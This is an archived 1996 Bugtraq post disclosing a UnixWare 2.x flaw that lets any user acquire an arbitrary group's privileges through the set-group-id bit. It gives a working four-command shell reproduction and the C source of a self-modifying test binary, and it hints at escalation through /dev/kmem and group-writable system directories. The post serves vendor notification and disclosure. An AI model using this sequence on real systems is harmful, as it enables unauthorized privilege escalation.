Bugtraq mailing list archives
More on the UnixWare problem
From: tv () pobox com (Todd Vierling)
Date: Fri, 23 Aug 1996 16:11:25 -0400
I'm afraid to do this, but all, here's the source to that binary I posted. Read it and gasp. :( The vendor's been notified but it'll be a while before I see action. I've contacted them; there's a trouble ticket open; I've also just learned that someone has leaked the details and it's flowing around the net already. CRINGE! You'll note that I took pains to hide the program's function, for good reason. I'd been through runaround at SCO for some time (I spent more than an hour on hold today alone <yikes>), but finally it was demonstrated to me by the following command sequence by a kind SCO engineer that on UnixWare 2.x (not just 2.0x, but 2.1 as well), the set-group-id privilege can be compromised by *any user*. % cp /usr/bin/ksh . % chmod 2700 ./ksh % chgrp 23456 ./ksh % ./ksh
id
And 'id' reports effective group ID of 23456. Oh, s**t. Watch out, /dev/kmem. How about mode 775 directories? What, you say /usr/bin comes that way by default, group 'bin'? Someone get me a bottle of Advil. Oh, it's a high-security system? Make that a double--of codeine. ===== #include <sys/types.h> #include <sys/stat.h> #include <stdio.h> #include <string.h> #include <time.h> #include <unistd.h> #define KEYMATCH "\x1D\xFC\x3A\x2FMZ" #define TESTGRP 17186 int main(int argc, char **argv) { struct stat st, *s = &st; pid_t p; if (argc == 2 && !strcmp(argv[1], KEYMATCH)) { if (getegid() == TESTGRP) { unsigned long r; srandom(time(NULL)); r = (unsigned long)random(); r = (r & 0xFFFF00FF) | ((r & 0xFF000000 >> 16) ^ (r & 0x00FF0000 >> 8) ^ (r & 0x000000FF << 8)); fprintf(stderr, "%s: system vulnerable code 0x%lX\n", argv[0], r); } else { fprintf(stderr, "%s: system not vulnerable\n", argv[0]); } return 0; } if (argc > 1) { fprintf(stderr, "%s: don't supply any arguments\n", argv[0]); return 0; } if (!strchr(argv[0], '/')) { fprintf(stderr, "%s: user error: run me with a pathname, not in $PATH\n", argv[0]); return 0; } if (stat(argv[0], s)) { fprintf(stderr, "%s: system error: cannot stat my binary?\n", argv[0]); return 0; } if (s->st_uid != geteuid() && s->st_uid != getuid()) { fprintf(stderr, "%s: user error: does this uid own my binary?\n", argv[0]); return 0; } chown(argv[0], -1, TESTGRP); if (chmod(argv[0], 02700)) { chown(argv[0], -1, s->st_gid); chmod(argv[0], s->st_mode); fprintf(stderr, "%s: user error: cannot chmod my own binary?\n", argv[0]); return 0; } if ((p = vfork()) == -1) { fprintf(stderr, "%s: system error: cannot fork\n", argv[0]); return 0; } if (!p) { execl(argv[0], argv[0], KEYMATCH, NULL); fprintf(stderr, "%s: system error: cannot exec\n", argv[0]); _exit(0); } chown(argv[0], -1, s->st_gid); chmod(argv[0], s->st_mode); return 0; } ===== == Todd Vierling (Personal tv () pobox com; Business tv () iag net) Cast a vote! == == System administrator/technician, Internet Access Group, Orlando Florida == == Dialups in Orange, Volusia, Lake, Osceola counties - http://www.iag.net ==
Current thread:
- BUG in /bin/bash Seven Up (Aug 22)
- <Possible follow-ups>
- Re: BUG in /bin/bash Red Barchetta (Aug 22)
- Re: BUG in /bin/bash The Ghost who Admins (Aug 22)
- Re: BUG in /bin/bash Digital Dreamer (Aug 22)
- Re: BUG in /bin/bash Earle Ake (Aug 22)
- IE 3.0? InterAccess Support Manager (Aug 22)
- Re: IE 3.0? Dave Andersen (Aug 23)
- More on the UnixWare problem Todd Vierling (Aug 23)
- resolv+ and finger... C. Hodges (Aug 23)
- Vulnerability in the Xt library Aleph One (Aug 24)
- Re: Vulnerability in the Xt library Stefan `Sec` Zehl (Aug 25)
- Re: Vulnerability in the Xt library Mike Neuman (Aug 27)
- Re: Vulnerability in the Xt library Casper Dik (Aug 28)
- Re: Vulnerability in the Xt library Mike Neuman (Aug 28)
- RFD: libsuid VaX#n8 (Aug 24)
- More on UnixWare 2.x vulnerability Todd Vierling (Aug 24)
- Re: (WORKAROUND) More on UnixWare 2.x vulnerability Hannu Laurila (Aug 24)
- polyglots (multi-language programs) John Nemeth (Aug 24)